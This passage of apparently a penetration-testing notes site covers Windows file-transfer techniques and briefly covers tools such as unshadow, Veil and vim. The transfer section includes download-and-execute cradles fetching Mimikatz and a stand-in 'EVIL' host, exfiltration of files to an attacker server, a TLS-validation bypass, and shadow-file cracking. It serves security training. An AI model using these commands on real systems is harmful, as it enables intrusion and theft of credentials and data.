                        # In attacker machine, check SSH Key MD5 Hash\nmd5sum id_rsa\n\n# In attacker machine, encode SSH Key to Base64\ncat id_rsa |base64 -w 0;echo\n\n\n# Copy output and paste it into the Windows PowerShell terminal in the victim's machine\nPS C:\\lala> [IO.File]::WriteAllBytes(\"C:\\Users\\Public\\id_rsa\", [Convert]::FromBase64String(\"LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFBQUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUFsd0FBQUFkemMyZ3RjbgpOaEFBQUFBd0VBQVFBQUFJRUF6WjE0dzV1NU9laHR5SUJQSkg3Tm9Yai84YXNHRUcxcHpJbmtiN2hIMldRVGpMQWRYZE9kCno3YjJtd0tiSW56VmtTM1BUR3ZseGhDVkRRUmpBYzloQ3k1Q0duWnlLM3U2TjQ3RFhURFY0YUtkcXl0UTFUQXZZUHQwWm8KVWh2bEo5YUgxclgzVHUxM2FRWUNQTVdMc2JOV2tLWFJzSk11dTJONkJoRHVmQThhc0FBQUlRRGJXa3p3MjFwTThBQUFBSApjM05vTFhKellRQUFBSUVBeloxNHc1dTVPZWh0eUlCUEpIN05vWGovOGFzR0VHMXB6SW5rYjdoSDJXUVRqTEFkWGRPZHo3CmIybXdLYkluelZrUzNQVEd2bHhoQ1ZEUVJqQWM5aEN5NUNHblp5SzN1Nk40N0RYVERWNGFLZHF5dFExVEF2WVB0MFpvVWgKdmxKOWFIMXJYM1R1MTNhUVlDUE1XTHNiTldrS1hSc0pNdXUyTjZCaER1ZkE4YXNBQUFBREFRQUJBQUFBZ0NjQ28zRHBVSwpFdCtmWTZjY21JelZhL2NEL1hwTlRsRFZlaktkWVFib0ZPUFc5SjBxaUVoOEpyQWlxeXVlQTNNd1hTWFN3d3BHMkpvOTNPCllVSnNxQXB4NlBxbFF6K3hKNjZEdzl5RWF1RTA5OXpodEtpK0pvMkttVzJzVENkbm92Y3BiK3Q3S2lPcHlwYndFZ0dJWVkKZW9VT2hENVJyY2s5Q3J2TlFBem9BeEFBQUFRUUNGKzBtTXJraklXL09lc3lJRC9JQzJNRGNuNTI0S2NORUZ0NUk5b0ZJMApDcmdYNmNoSlNiVWJsVXFqVEx4NmIyblNmSlVWS3pUMXRCVk1tWEZ4Vit0K0FBQUFRUURzbGZwMnJzVTdtaVMyQnhXWjBNCjY2OEhxblp1SWc3WjVLUnFrK1hqWkdqbHVJMkxjalRKZEd4Z0VBanhuZEJqa0F0MExlOFphbUt5blV2aGU3ekkzL0FBQUEKUVFEZWZPSVFNZnQ0R1NtaERreWJtbG1IQXRkMUdYVitOQTRGNXQ0UExZYzZOYWRIc0JTWDJWN0liaFA1cS9yVm5tVHJRZApaUkVJTW84NzRMUkJrY0FqUlZBQUFBRkhCc1lXbHVkR1Y0ZEVCamVXSmxjbk53WVdObEFRSURCQVVHCi0tLS0tRU5EIE9QRU5TU0ggUFJJVkFURSBLRVktLS0tLQo=\"))\n\n# Confirming the MD5 Hashes Match with  Get-FileHash cmdlet\nPS C:\\lala> Get-FileHash C:\\Users\\Public\\id_rsa -Algorithm md5\n

                        More about the Get-FileHash cmdlet.

                        Windows Command Line utility (cmd.exe) has a maximum string length of 8,191 characters. Also, a web shell may error if you attempt to send extremely large strings.

                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#download-from-windows-victim-to-linux-attacker","title":"Download from Windows (victim) to linux (attacker)","text":"

                        In the victim's machine (windows):

                        # Encode File Using PowerShell\n[Convert]::ToBase64String((Get-Content -path \"C:\\Windows\\system32\\drivers\\etc\\hosts\" -Encoding byte))\n\n\nGet-FileHash \"C:\\Windows\\system32\\drivers\\etc\\hosts\" -Algorithm MD5 | select Hash\n

                        In the attacker's machine (Linux): We copy this content and paste it into our attack host, use the base64 command to decode it, and use the md5sum application to confirm the transfer happened correctly.

                        echo IyBDb3B5cmlnaHQgKGMpIDE5OTMtMjAwOSBNaWNyb3NvZnQgQ29ycC4NCiMNCiMgVGhpcyBpcyBhIHNhbXBsZSBIT1NUUyBmaWxlIHVzZWQgYnkgTWljcm9zb2Z0IFRDUC9JUCBmb3IgV2luZG93cy4NCiMNCiMgVGhpcyBmaWxlIGNvbnRhaW5zIHRoZSBtYXBwaW5ncyBvZiBJUCBhZGRyZXNzZXMgdG8gaG9zdCBuYW1lcy4gRWFjaA0KIyBlbnRyeSBzaG91bGQgYmUga2VwdCBvbiBhbiBpbmRpdmlkdWFsIGxpbmUuIFRoZSBJUCBhZGRyZXNzIHNob3VsZA0KIyBiZSBwbGFjZWQgaW4gdGhlIGZpcnN0IGNvbHVtbiBmb2xsb3dlZCBieSB0aGUgY29ycmVzcG9uZGluZyBob3N0IG5hbWUuDQojIFRoZSBJUCBhZGRyZXNzIGFuZCB0aGUgaG9zdCBuYW1lIHNob3VsZCBiZSBzZXBhcmF0ZWQgYnkgYXQgbGVhc3Qgb25lDQojIHNwYWNlLg0KIw0KIyBBZGRpdGlvbmFsbHksIGNvbW1lbnRzIChzdWNoIGFzIHRoZXNlKSBtYXkgYmUgaW5zZXJ0ZWQgb24gaW5kaXZpZHVhbA0KIyBsaW5lcyBvciBmb2xsb3dpbmcgdGhlIG1hY2hpbmUgbmFtZSBkZW5vdGVkIGJ5IGEgJyMnIHN5bWJvbC4NCiMNCiMgRm9yIGV4YW1wbGU6DQojDQojICAgICAgMTAyLjU0Ljk0Ljk3ICAgICByaGluby5hY21lLmNvbSAgICAgICAgICAjIHNvdXJjZSBzZXJ2ZXINCiMgICAgICAgMzguMjUuNjMuMTAgICAgIHguYWNtZS5jb20gICAgICAgICAgICAgICMgeCBjbGllbnQgaG9zdA0KDQojIGxvY2FsaG9zdCBuYW1lIHJlc29sdXRpb24gaXMgaGFuZGxlZCB3aXRoaW4gRE5TIGl0c2VsZi4NCiMJMTI3LjAuMC4xICAgICAgIGxvY2FsaG9zdA0KIwk6OjEgICAgICAgICAgICAgbG9jYWxob3N0DQo= | base64 -d > hosts\n\n\nmd5sum hosts \n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#certutil","title":"Certutil","text":"

                        It's possible to download a file with certutil:

                        certutil.exe -urlcache -split -f \"https://download.sysinternals.com/files/PSTools.zip\" pstools.zip\n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-systemnetwebclient","title":"PowerShell System.Net.WebClient","text":"

                        PowerShell offers many file transfer options. In any version of PowerShell, the System.Net.WebClient class can be used to download a file over HTTP, HTTPS or FTP.

                        The following table describes WebClient methods for downloading data from a resource:

                        Method Description OpenRead Returns the data from a resource as a Stream. OpenReadAsync Returns the data from a resource without blocking the calling thread. DownloadData Downloads data from a resource and returns a Byte array. DownloadDataAsync Downloads data from a resource and returns a Byte array without blocking the calling thread. DownloadFile Downloads data from a resource to a local file. DownloadFileAsync Downloads data from a resource to a local file without blocking the calling thread. DownloadString Downloads a String from a resource and returns a String. DownloadStringAsync Downloads a String from a resource without blocking the calling thread.","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-downloadstring-fileless-method","title":"PowerShell DownloadString - Fileless Method","text":"
                        # Example: (New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')\nPS C:\\lala> (New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1','C:\\Users\\Public\\Downloads\\PowerView.ps1')\n# Net.WebClient: class name\n# DownloadFile: method\n\n\n# Example: (New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>')\nPS C:\\lala> (New-Object Net.WebClient).DownloadFileAsync('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1', 'PowerViewAsync.ps1')\n# Net.WebClient: class name\n# DownloadFileAsync: method\n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-downloadstring-fileless-method_1","title":"PowerShell DownloadString - Fileless Method","text":"

                        PowerShell can also be used to perform fileless attacks. Instead of downloading a PowerShell script to disk, we can run it directly in memory using the Invoke-Expression cmdlet or the alias IEX.

                        PS C:\\lala> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')\n

                        IEX also accepts pipeline input.

                        PS C:\\lala> (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1') | IEX\n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-invoke-webrequest","title":"PowerShell Invoke-WebRequest","text":"

                        From PowerShell 3.0 onwards, the Invoke-WebRequest cmdlet is also available. This cmdlet gets content from a web page on the internet. We can use the aliases iwr, curl, and wget instead of the Invoke-WebRequest full name.

                        Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1\n# alias: `iwr`, `curl`, and `wget`\n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#more-downloading-techniques","title":"More downloading techniques","text":"

                        From Harmj0y:

                        # normal download cradle\nIEX (New-Object Net.Webclient).downloadstring(\"http://EVIL/evil.ps1\")\n\n# PowerShell 3.0+\nIEX (iwr 'http://EVIL/evil.ps1')\n\n# hidden IE com object\n$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r\n\n# Msxml2.XMLHTTP COM object\n$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText\n\n# WinHttp COM object (not proxy aware!)\n$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText\n\n# using bitstransfer- touches disk!\nImport-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\\t;$r=gc $env:temp\\t;rm $env:temp\\t; iex $r\n\n# DNS TXT approach from PowerBreach (https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1)\n#   code to execute needs to be a base64 encoded string stored in a TXT record\nIEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt \"SERVER\" | Select -Pattern '\"*\"') -split '\"'[0]))))\n\n# from @subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d\n<#\n<?xml version=\"1.0\"?>\n<command>\n   <a>\n      <execute>Get-Process</execute>\n   </a>\n  </command>\n#>\n$a = New-Object System.Xml.XmlDocument\n$a.Load(\"https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt\")\n$a.command.a.execute | iex\n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#bypassing-techniques","title":"Bypassing techniques","text":"","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#the-parameter-usebasicparsing","title":"The parameter -UseBasicParsing","text":"

                        There may be cases when the Internet Explorer first-launch configuration has not been completed, which prevents the download.

                        Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | IEX\n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#ssltls-secure-channel","title":"SSL/TLS secure channel","text":"

                        Another error in PowerShell downloads is related to the SSL/TLS secure channel if the certificate is not trusted. We can bypass that error with the following command:

                        # With this command we get the error Exception calling \"DownloadString\" with \"1\" argument(s): \"The underlying connection was closed: Could not establish trust relationship for the SSL/TLS secure channel.\"\nIEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')\n\n##### To bypass it, first run\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-web-uploads","title":"PowerShell Web Uploads","text":"

                        First, we launch a webserver in out attacker machine. We can use uploadserver.

                        # Install a Configured WebServer with Upload\npip3 install uploadserver\n\n# Run web server\npython3 -m uploadserver\n

                        From the victim's machine (windows), we will upload the file with Invoke-WebRequest:

                        # PowerShell Script to Upload a File to Python Upload Server\nIEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')\n\nInvoke-FileUpload -Uri http://$ipServer:8000/upload -File C:\\Windows\\System32\\drivers\\etc\\hosts\n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-base64-web-upload","title":"PowerShell Base64 Web Upload","text":"

                        Another way to use PowerShell and base64 encoded files for upload operations is by using Invoke-WebRequest or Invoke-RestMethod together with Netcat.

                        $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\\Windows\\System32\\drivers\\etc\\hosts' -Encoding Byte))\n\nInvoke-WebRequest -Uri http://$ipServer:8000/ -Method POST -Body $b64\n

                        From the attacker machine:

                        # We catch the base64 data with Netcat and use the base64 application with the decode option to convert the string to the file.\nnc -lvnp 8000\n\necho <base64> | base64 -d -w 0 > hosts\n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#smb-downloads","title":"SMB Downloads","text":"","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#simple-smbserver","title":"Simple SMBserver","text":"

                        From attacker machine, we can use smbserver.py:

                        # First, we create an SMB server in our attacker machine (linux) with smbserver from Impacket \n\nsudo impacket-smbserver share -smb2support /tmp/smbshare\n

                        From the windows machine, the victim's, copy the File from the SMB Server

                        copy \\\\$ipServer\\share\\nc.exe\n

                        If blocked because of organization's security policies blocking unauthenticated guest access, create the SMBserver with username and password.

                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#smbserver-with-authentication","title":"SMBServer with authentication","text":"

                        From attacker machine, we can use smbserver.py:

                        sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test\n

                        From victim's machine, the windows one:

                        # mount the SMB Server with Username and Password\nnet use n: \\\\$ipServer\\share /user:test test\n\n# Copy the file\ncopy n:\\nc.exe\n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#smb-uploads","title":"SMB Uploads","text":"

                        Commonly enterprises don't allow the SMB protocol (TCP/445) out of their internal network because this can open them up to potential attacks.

                        An alternative is to run SMB over HTTP with WebDav. WebDAV is an extension of HTTP, the internet protocol that web browsers and web servers use to communicate with each other. The WebDAV protocol enables a webserver to behave like a fileserver, supporting collaborative content authoring. WebDAV can also use HTTPS.

                        When you use SMB, it will first attempt to connect using the SMB protocol, and if there's no SMB share available, it will try to connect using HTTP.

                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#configuring-webdav-server","title":"Configuring WebDav Server","text":"

                        To set up our WebDav server, we need to install two Python modules, wsgidav and cheroot.

                        pip install wsgidav cheroot\n
                        sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous \n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#connect-to-the-server-and-the-share-from-windows","title":"Connect to the server and the share from windows","text":"

                        Now we can attempt to connect to the share using the DavWWWRoot directory.

                        # DavWWWRoot is a special keyword recognized by the Windows Shell. No such folder exists on your WebDAV server. \nC:\\lala> dir \\\\$ipServer\\DavWWWRoot\n\n# Upload files with SMB\ncopy C:\\Users\\john\\Desktop\\SourceCode.zip \\\\$ipServer\\DavWWWRoot\\\n

                        If there are no SMB (TCP/445) restrictions, you can use impacket-smbserver the same way we set it up for download operations.

                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#ftp-downloads","title":"FTP Downloads","text":"","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#pyftpdlib-module","title":"pyftpdlib module","text":"

                        Configure an FTP Server in our attack host using Python3 pyftpdlib module:

                        sudo pip3 install pyftpdlib\n

                        Then we can specify port number 21 because, by default, pyftpdlib uses port 2121. Anonymous authentication is enabled by default if we don't set a user and password.

                        sudo python3 -m pyftpdlib --port 21\n

                        We can use the FTP client or PowerShell Net.WebClient to download files from an FTP server.

                        (New-Object Net.WebClient).DownloadFile('ftp://$ipServer/file.txt', 'ftp-file.txt')\n

                        When we get a shell on a remote machine, we may not have an interactive shell. Example:

                        C:\\htb> echo open 192.168.49.128 > ftpcommand.txt\nC:\\htb> echo USER anonymous >> ftpcommand.txt\nC:\\htb> echo binary >> ftpcommand.txt\nC:\\htb> echo GET file.txt >> ftpcommand.txt\nC:\\htb> echo bye >> ftpcommand.txt\nC:\\htb> ftp -v -n -s:ftpcommand.txt\nftp> open 192.168.49.128\nLog in with USER and PASS first.\nftp> USER anonymous\n\nftp> GET file.txt\nftp> bye\n\nC:\\htb>more file.txt\nThis is a test file\n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#ftp-uploads","title":"FTP Uploads","text":"","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#run-pyftpdlib-a-ftp-server","title":"Run pyftpdlib, a FTP server","text":"

                        We will use module pyftpdlib, with the option --write to allow clients to upload files to our attack host.

                        sudo python3 -m pyftpdlib --port 21 --write\n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#powershell-upload-file","title":"PowerShell Upload File","text":"
                        (New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\\Windows\\System32\\drivers\\etc\\hosts')\n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"transferring-files-techniques-windows/#create-a-command-file-for-the-ftp-client-to-upload-a-file","title":"Create a Command File for the FTP Client to Upload a File","text":"

                        Example:

                        C:\\htb> echo open 192.168.49.128 > ftpcommand.txt\nC:\\htb> echo USER anonymous >> ftpcommand.txt\nC:\\htb> echo binary >> ftpcommand.txt\nC:\\htb> echo PUT c:\\windows\\system32\\drivers\\etc\\hosts >> ftpcommand.txt\nC:\\htb> echo bye >> ftpcommand.txt\nC:\\htb> ftp -v -n -s:ftpcommand.txt\nftp> open 192.168.49.128\n\nLog in with USER and PASS first.\n\n\nftp> USER anonymous\nftp> PUT c:\\windows\\system32\\drivers\\etc\\hosts\nftp> bye\n
                        ","tags":["windows","exploitation","file transfer technique","backdoors"]},{"location":"unshadow/","title":"unshadow","text":"

                        unshadow - combines passwd and shadow files

                        ","tags":["bash"]},{"location":"unshadow/#brute-forcing-etcpasswd-and-etcshadow","title":"Brute forcing /etc/passwd and /etc/shadow","text":"

                        First, save /etc/passwd and john /etc/shadow from the victim machine to the attacker machine.

                        Second, use unshadow to put users and passwords in the same file:

                        unshadow passwd shadow > crackme\n# passwd: file saved with /etc/passwd content.\n# shadow: file saved with /etc/shadow content.\n

                        Third, run johtheripper or hashcat to crack the hash.

                        ","tags":["bash"]},{"location":"uploadserver/","title":"uploadserver","text":"

                        Python's http.server extended to include a file upload page

                        ","tags":["file transfer technique","server"]},{"location":"uploadserver/#installation","title":"Installation","text":"

                        Download from github repo: https://github.com/Densaugeo/uploadserver.

                        python3 -m pip install --user uploadserver\n
                        ","tags":["file transfer technique","server"]},{"location":"uploadserver/#basic-usage","title":"Basic usage","text":"
                        python3 -m uploadserver\n

                        Accepts the same options as http.server. After the server starts, the upload page is at /upload. For example, if the server is running at http://localhost:8000/ go to http://localhost:8000/upload .

                        Now supports uploading multiple files at once! Select multiple files in the web page's file selector, or upload with cURL:

                        curl -X POST http://127.0.0.1:8000/upload -F 'files=@multiple-example-1.txt' -F 'files=@multiple-example-2.txt'\n

                        See an example in File Transfer techniques for Linux.

                        ","tags":["file transfer technique","server"]},{"location":"username-anarchy/","title":"Username Anarchy","text":"

                        Ruby-based tool for generating usernames.

                        This is useful for user account/password brute force guessing and username enumeration when usernames are based on the users' names. By attempting a few weak passwords across a large set of user accounts, user account lockout thresholds can be avoided.

                        "},{"location":"username-anarchy/#installation","title":"Installation","text":"

                        Download from github repo: https://github.com/urbanadventurer/username-anarchy.

                        git clone https://github.com/urbanadventurer/username-anarchy.git\n
                        "},{"location":"username-anarchy/#basic-usage","title":"Basic usage","text":"
                        cd username-anarchy\n./username-anarchy -i /home/ltnbob/realneames.txt \n
                        "},{"location":"veil/","title":"veil","text":"","tags":["pentesting","web pentesting"]},{"location":"veil/#installation","title":"Installation","text":"

                        Repository: https://github.com/Veil-Framework/Veil/

                        Quick install for kali:

                        apt update\napt install -y veil\n/usr/share/veil/config/setup.sh --force --silent\n

                        To run veil:

                        veil\n
                        ","tags":["pentesting","web pentesting"]},{"location":"veil/#usage-and-basic-command","title":"Usage and basic command","text":"

                        Tool \"Evasion\" creates undetectable backdoors.

                        \"Ordenance\" is the payload part that we will launch to this backdoor.

                        Reading list:

                        • https://www.zonasystem.com/2020/07/shellter-veil-evasion-evasion-de-antivirus-ocultando-shellcodes-de-binarios.html
                        • https://www.hackingloops.com/veil-evasion-virustotal/---

                        One nice thing about veil is that it provides a metasploit RC file, meaning that in order to launch the multihandler you just need to run:

                        msfconsole -r path/to/metasploitRCfile\n
                        ","tags":["pentesting","web pentesting"]},{"location":"vim/","title":"Vim - A text editor","text":""},{"location":"vim/#open-a-file","title":"Open a file","text":"

                        To edit a new file.

                        nvim <file>\n

                        Open a file in a recovery mode:

                        nvim -r <file>\n
                        "},{"location":"vim/#go-to-insert-mode","title":"Go to INSERT mode","text":"

                        To enter into edit mode, press Supr twice and start writting

                        • a : Cursor after the character.
                        • i : Cursor before the character.
                        • A : Cursor at the end of the line.
                        • I : Cursor at the beginning of the line.

                        To get out of INSERT mode, press ESC.

                        "},{"location":"vim/#browsing-the-file-in-cursor-mode","title":"Browsing the file in CURSOR mode","text":"
                        • 2: Go to line 2 of the file.
                        • gg: Go to line 1 of the file.
                        • G : Go to last line.
                        • G : Go to line n.
                        • 0 : Go to the beginning of line.
                        • $ : Go to the end of line.
                        • "},{"location":"vim/#delete-cut-in-cursor-mode","title":"Delete (cut) in CURSOR mode","text":"

                          There is no delete in CURSOR mode. What it does is to CUT the content. There is also no need to enter into the INSERT mode to remove some text. You can delete text in the CURSOR mode with these keys:

                          • x : Cut character.
                          • dd : Cut full line.
                          • dw : Cut word.
                          • d$ : Cut from the cursor position to the end of line.
                          • dw : Cut n words from cursor position. For instance, \"d3w\" cuts three words.
                          • dd : Cut n lines from cursor position. For instance, \"d4d\" cuts four lines.
                          • ciw : Cut word no matter cursor position. Also no matter it word was in parathesis or \"\".
                          • yw: Copy word.
                          • yy: Copy full line.
                          • Tip: We can multiply any command to run multiple times by adding a number before it. For example, '4yw' would copy 4 words instead of one, and so on.

                            "},{"location":"vim/#select-text","title":"Select text","text":"

                            To select a content in CURSOR mode you need to change to VISUAL mode.

                            • v : Changes from CURSOR mode to VISUAL mode.
                            • V : Changes from CURSOR mode to VISUAL mode AND select the line where the cursor was.

                            Being in VISUAL mode you can:

                            • Select lines with cursor position (Up and Down arrows).
                            • w : Select a word.
                            "},{"location":"vim/#replace-in-cursor-mode","title":"Replace in CURSOR mode","text":"
                            • R : Insert the text you want and it replaces the existing one.
                            "},{"location":"vim/#copy-in-cursor-mode","title":"Copy in CURSOR mode","text":"

                            To copy into the clip:

                            • y : Copy selected content into the clip.
                            "},{"location":"vim/#paste-in-cursor-mode","title":"Paste in CURSOR mode","text":"

                            Everything you delete goes to the clip. To paste in CURSOR mode, press key:

                            • p : Paste clip in the next line.
                            • P : Paste clip in previous line.
                            "},{"location":"vim/#insert-a-line-in-cursor-mode","title":"Insert a line in CURSOR mode","text":"

                            Press these keys:

                            • o : Add a line under cursor position.
                            • O : Add a line before cursor position.
                            "},{"location":"vim/#undo-and-redo-changes-in-cursor-mode","title":"Undo and Redo changes in CURSOR mode","text":"

                            You can do and undo changes from CURSOR mode with these keys:

                            • u : Undo changes.
                            • r : Redo changes.
                            "},{"location":"vim/#close-a-file","title":"Close a file","text":"

                            There were no modifications. Close it without save it:

                            # Press Esc key to enter CURSOR mode.\n:q\n# Hit ENTER\n

                            There were modifications but you don't want to save it:

                            # Press Esc key to enter CURSOR mode.\n:q!\n# Hit ENTER\n
                            "},{"location":"vim/#save-a-file","title":"Save a file","text":"

                            To save the file and continue editing:

                            # Press Esc key to enter CURSOR mode.\n:w\n# Hit ENTER\n

                            To save the file and quit the editor:

                            # Press Esc key to enter CURSOR mode.\n:wq!\n# Hit ENTER\n

                            Also, you can:

                            # Press Esc key to enter CURSOR mode.\n:x\n# Hit ENTER\n

                            To save the file with a different name:

                            # Press ESC key to enter CURSOR mode.\n:w <newFileName>\n# Hit ENTER\n
                            "},{"location":"vim/#browsing-activities-in-the-editor","title":"Browsing activities in the editor","text":"

                            Keys g+d: highlight the definition of a variable/function/... in the file. Keys g+f: takes you to the definition of that variable/function/... in the file, even if it's a different file from the one we have open. Our browsing activity will pile up in the VIM editor.

                            To switch between activities:

                            • CTRL+o : Go back into the browsing activity.
                            • CTRL+i : Go forward.
                            "},{"location":"vim/#search-in-cursor-mode","title":"Search in CURSOR mode","text":"

                            Search from cursor position with:

                            • \\expression : Search word expression.
                            • n : Go to the next occurrence.
                            • N : Go to previous occurrence.
                            • ESC : Escape the search.
                            "},{"location":"vim/#browsing-from-opening-and-closing-tags","title":"Browsing from opening and closing tags","text":"

                            Move the cursor position from a closing parenthesis to the opening one:

                            • % : Change position between opening or closing tags () [] \" \"
                            "},{"location":"vim/#substitute-in-cursor-mode","title":"Substitute in CURSOR mode","text":"

                            To change \"expresion1\" to \"expresion2\" for the first occurrence:

                            # Press ESC key to enter CURSOR mode.\n:s/expression1/expression2\n

                            To change all occurrences of the line:

                            # Press ESC key to enter CURSOR mode.\n:s/expression1/expression2/g\n

                            To change all occurrences in the document (not asking one by one):

                            # Press ESC key to enter CURSOR mode.\n:s%/expression1/expression2/g\n

                            To change all occurrences in the document asking one by one:

                            # Press ESC key to enter CURSOR mode.\n:s%/expression1/expression2/gc\n
                            "},{"location":"virtualbox/","title":"VirtualBox and Extension Pack","text":"

                            How to install the Extension Pack manually, bypassing possible policies existing in a Windows DC.

                            1. The .vbox-extpack file that can be downloaded. Actually, it is just a .tar.gz archive so its contents can be unpacked.
                            2. Place these contents in subdirectory ExtensionPacks of the VirtualBox installation directory, tipically C:\\Program Files\\Oracle\\VirtualBox
                            3. That's it. Run Virtualbox and click on Install extension in the corresponding section. Installation now will be successful.
                            ","tags":["windows","bypass techniques"]},{"location":"virtualbox/#how-to-enlarge-a-virtual-machines-disk-in-virtualbox","title":"How to Enlarge a Virtual Machine\u2019s Disk in VirtualBox","text":"

                            In VirtualBox, go to File > Virtual Media Manager and use the slider to adjust the disk size. In VMWare, right-click your virtual machine (VM), then go to Settings > Hard Disk > Expand, and expand the disk. Finally, boot your VM and expand the partition using GParted on Linux or Disk Management on Windows.

                            ","tags":["windows","bypass techniques"]},{"location":"vnstat/","title":"vnstat - Monitoring network impact","text":"","tags":["network","bash","tools"]},{"location":"vnstat/#installation","title":"Installation","text":"
                            sudo apt install vnstat    \n
                            ","tags":["network","bash","tools"]},{"location":"vnstat/#basic-usage","title":"Basic usage","text":"

                            Monitor the eth0 network adapter before running a Nessus scan:

                            sudo vnstat -l -i eth0\n
                            ","tags":["network","bash","tools"]},{"location":"vpn/","title":"VPN notes","text":"

                            There are two main types of remote access VPNs: client-based VPN and SSL VPN. SSL VPN uses the web browser as the VPN client.

                            Usage of a VPN service does not guarantee anonymity or privacy but is useful for bypassing certain network/firewall restrictions or when connected to a possible hostile network.

                            When connected to any penetration testing/hacking-focused lab, we should always consider the network to be \"hostile.\" We should only connect from a virtual machine, disallow password authentication if SSH is enabled on our attacking VM, lockdown any web servers, and not leave sensitive information on our attack VM.

                            DO NOT use the same VM that we use to perform client assessments to play CTF in any platform .

                            # Show us the networks accessible via the VPN.\n netstat -rn\n
                            ","tags":["vpn"]},{"location":"vulnerability-assessment/","title":"Vulnerability assessment","text":"

                            Tools: nessus, openvas

                            ","tags":["pentesting","assessment","openvas","nessus"]},{"location":"vulnhub-goldeneye-1/","title":"Walkthrough - GoldenEye 1, a vulnhub machine","text":"","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#about-the-machine","title":"About the machine","text":"data Machine GoldenEye 1 Platform Vulnhub url link Download https://drive.google.com/open?id=1M7mMdSMHHpiFKW3JLqq8boNrI95Nv4tq Download Mirror https://download.vulnhub.com/goldeneye/GoldenEye-v1.ova Size 805 MB Author creosote Release date 4 May 2018 Description OSCP type vulnerable machine that's themed after the great James Bond film (and even better n64 game) GoldenEye. The goal is to get root and capture the secret GoldenEye codes - flag.txt. Difficulty Easy","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#walkthrough","title":"Walkthrough","text":"","tags":["walkthrough"]},{"location":"vulnhub-goldeneye-1/#setting-up-the-machines","title":"Setting up the machines","text":"

                            I'll be using Virtual Box.

                            Kali machine (from now on: attacker machine) will have two network interfaces:

                            • eth0 interface: NAT mode (for internet connection).
                            • eth1 interface: Host-only mode (for attacking the victim machine).

